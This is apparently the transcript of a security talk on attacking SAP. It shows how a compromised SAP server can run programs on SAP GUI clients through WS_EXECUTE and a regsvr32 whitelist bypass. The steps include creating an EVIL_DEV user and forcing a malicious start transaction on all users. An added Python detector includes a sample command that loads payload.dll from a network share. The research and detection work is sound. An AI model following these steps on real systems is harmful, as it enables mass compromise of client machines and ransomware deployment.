In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
How to get admin privileges in SAP?
Over 500 companies have a vulnerable CTC servlet (RCE, 2011)
3 Java serialization exploits (RCE without authorization, 2015)
Information disclosure + SQL injection + crypto issue + misconfiguration = RCE (Black Hat 2016)
DoS + DoS + race condition + auth bypass = RCE (Troopers 2016)
Anonymous directory traversal + privilege escalation = RCE (we are waiting for a fix)
Minimum impact
To compromise SAP, one needs to find a vulnerability, or a chain of vulnerabilities, that allows reading SecStore.properties and SecStore.key to obtain an administrator user with SAP_ALL privileges, or to elevate privileges and gain access to the system as the SAP user or root.
SAP GUI: motivation
Goal: attack SAP users from a compromised SAP server
While executing the transaction “DBACockpit” to manage the database, we noticed that SAP GUI offers to open the database management program.
After clicking on the web browser button, SAP GUI launched the IE browser and opened the URL without any security notification.
Interesting! Maybe we can start any program on the client’s computer…
We had 4 ways to disable the security prompt:
• Open some URL with a vulnerable/malicious ActiveX control using IE
• Analyze sapfesec.dll, which SAP GUI uses to draw the prompt
• Search for a vulnerability in the whitelisted EXE files
SAP JAVA GUI
• Works great on SAP GUI
• What about SAP JAVA GUI?
SAP JAVA GUI: trust levels
• When a client connects to the server for the first time, a trust level for the SAP server should be defined
SAP JAVA GUI: trust levels
• Productive
  • We can execute any program on a client’s computer without user interaction
• Untrusted
  • We can’t execute a program on a client’s computer
  • BUT it is possible to connect the user to another SAP server
SAP JAVA GUI: RCE
• Productive
  • just execute any program via WS_EXECUTE
• Untrusted
  • connect the user to a productive system
  • execute any program via WS_EXECUTE
One type of malware: ransomware
Most popular ransomware: CryptoLocker, TorrentLocker, CryptoWall, Fusob (for mobile)
Initial ransom starts at $150 to $2,000 (Cryptomix)
Here is our agenda for today.
We’ll start with a brief review of the most common and critical vulnerabilities in SAP. These vulnerabilities give an opportunity to access and compromise critical business data.
Then we’ll watch a clip about the chain of vulnerabilities presented a year ago at Troopers 2016 and discuss what exactly an attacker can do when they find and exploit SAP vulnerabilities.
In addition, we’ll reveal our reasons for conducting this research and watch a clip about the exploitation of this vulnerability.
And we have a bonus video for you.
Now, let us analyze the vulnerabilities we’ve managed to find.
One of the most critical vulnerabilities, a Remote Code Execution, was detected in 2011. It allows any unauthorized user to easily execute an OS command via a web browser. Although the vulnerability had been detected 6 years ago, it was successfully used by some Asian hackers in 2016. To the present day, the Internet is still being scanned for this vulnerability.
It’s also worth mentioning that last year, after we had learnt about the vulnerability, we scanned the Internet as well and found that the number of companies which hadn’t fixed it exceeded 500.
To obtain critical information from SAP, attackers or pentesters need to find a vulnerability in SAP which would give them the contents of the secure store files (SecStore.properties and SecStore.key). The administrator password used to access the SAP database is stored in these files. Once access as an SAP application administrator is obtained, the next step is to find and exploit a vulnerability in another component which gives system-level access to SAP.
Now it’s time to have a look at the common working scheme of SAP. With the help of SAP GUI, users connect to the SAP server and do their work.
Let’s consider a situation where an attacker obtains information about SAP, exploits a vulnerability, e.g. in the SAP gateway or SAP disp+work, and gains access to the SAP database.
While pentesting, we stopped at the stage of accessing the SAP database, but today we suggest going further.
Here is a demo from the previous Troopers conference.
So, why did we decide to do this research? It’s no secret that there are a lot of transactions, functions and applications in SAP which allow managing and monitoring the system, and viewing logs.
Once again, we executed the DBACockpit transaction and saw this important database management functionality.
SAP GUI requested from us a path to open the database management program. When we wanted to start it with the web browser button, SAP GUI launched the IE browser and opened the URL without any security notification. So, we decided to create a special ABAP program with which we could execute any program on target computers. When the research was finished, we had identified the simplest and most common way to start programs on a client’s computer, which is the WS_EXECUTE function.
However, when we tried launching the calculator with the help of WS_EXECUTE, we got a warning message: “Do you allow SAP GUI to start calc on your computer?”
That was not what we actually wanted. So, the next question is: “How to bypass this message?”
We thought, “It’s worth searching on Google. Perhaps someone has already found out how to turn the message off.” Yep, someone had. Actually, we found a whole bunch of forum replies about disabling the message by changing the Windows registry. However, none of them was suitable for us, because we just couldn’t change registry keys remotely. Moreover, the solution wasn’t applicable to newer SAP GUI versions.
Still, there were 4 other ways to solve the problem:
To open a special URL, which would use a vulnerable ActiveX control, in Internet Explorer.
To analyse how SAP GUI renders the nag screen with the help of sapfesec.dll.
To find a vulnerability in the whitelist (we’ll speak about this option a bit later).
And the 4th one… well, one doesn’t even want to consider it… :D
However, at the first stage of the research, the ActiveX method dropped out. So, we proceeded with the 2nd one.
As mentioned before, the SAP security prompt is rendered by the sapfesec.dll file. Analyzing this file, we learnt that if applications are stored in the SAP GUI directory under certain names, the SAP security prompt won’t appear. Thus, we went on researching with this method.
Mhmm… have you noticed that there is a Regsvr32 – file – read, write, execute record in the whitelist?
I.e. if this file is called from Windows, SAP GUI will show no alerts and the file will be executed. Nonetheless, regsvr32 is a Windows OS file which is required for stable operation of the system, as well as for installing and managing DLL files.
Regsvr32 is launched with predefined arguments, with the path to a DLL file as a mandatory one. A common DLL responsible for launching calc looks this way:
It should be checked which of these functions will finish its work first.
It appears that software written in ABAP and responsible for arbitrary code execution on a target system will have the following form. Here smb_share is a public data storage where our DLL with the malicious code will be put.
Let’s consider a hypothetical situation: what would happen if an attacker found the vulnerability.
For starters, to get RCE on a client’s computer, it is necessary to create a user with developer rights. The user SAP* cannot create or change any programs. To do this, run transaction SU01 and copy a user, for example, create a new user with SAP_ALL rights under the login EVIL_DEV.
Then, log in as the EVIL_DEV user, run transaction SE38 and create a program sap_malware_prog.
If the user with developer rights is a new one, a developer key will be needed, which is not a challenge for an attacker.
No comment
Then, once we are able to create a program, we click the Insert button, paste a program which executes the malicious functionality, then save everything and activate the program.
The program is created; now we need to create a custom transaction which will launch the malware. For example, we call the transaction MLAUNCHER.
Tie the transaction MLAUNCHER to the malicious program sap_malware_prog and save it.
However, you can go a step further and set a default transaction. When a user logs in, the transaction MLAUNCHER will start and the machine will run the malicious code.
The screenshot shows that we set the start transaction MLAUNCHER for all users.
And then, if a user logs in to the SAP system, right after login it will process the MLAUNCHER transaction and, for example, launch a calculator.
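From the defender’s side, the chain above leaves a clear trace on the client: SAP GUI (saplogon.exe on Windows) spawning a whitelisted binary such as regsvr32 with a DLL path on an SMB share. The following is an added detection example, not code from the talk; the event layout (Sysmon-style ParentImage/Image/CommandLine fields), the sample events and the list of suspicious child processes are constructed assumptions for illustration.

```python
import re
from typing import Dict, List

# Constructed sample of process-creation events (Sysmon Event ID 1 style
# fields, flattened to a dict). Not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s \\smb_share\public\payload.dll"},
    {"ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r"iexplore.exe http://dbhost:1128/"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe C:\Windows\System32\somelib.dll"},
    {"ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
     "Image": r"C:\Windows\System32\calc.exe",
     "CommandLine": "calc.exe"},
]

# Children a legitimate SAP GUI session has little reason to start
# (assumed list for this example; tune it to your environment).
SUSPICIOUS_CHILDREN = {"regsvr32.exe", "rundll32.exe", "calc.exe", "cmd.exe"}
# Matches a UNC path such as \\server\share anywhere in the command line.
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> str:
    """Return 'high', 'medium' or 'ok' for one process-creation event."""
    if _basename(event["ParentImage"]) != "saplogon.exe":
        return "ok"            # not spawned by SAP GUI at all
    child = _basename(event["Image"])
    if child not in SUSPICIOUS_CHILDREN:
        return "ok"            # e.g. the browser launch from DBACockpit
    # regsvr32 loading a DLL from a network share is the pattern from the talk
    if child == "regsvr32.exe" and UNC_PATH.search(event["CommandLine"]):
        return "high"
    return "medium"

def find_suspicious(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events worth a look, annotated with their severity."""
    return [{**ev, "severity": classify(ev)} for ev in events if classify(ev) != "ok"]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit["severity"], hit["CommandLine"])
```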
Demo video here.
How can information theft from users’ computers harm, say, a company with 1000 users?! Of course, by using ransomware.
Protection against ransomware is difficult. Ransomware-as-a-service attacks have been growing more popular since the end of 2016.
1. If you are infected, then infect a friend or friends, and you will be unlocked
2. If you want to earn money, spread ransomware and get money
Ransomware is becoming more and more popular, and the number of infected user machines is increasing.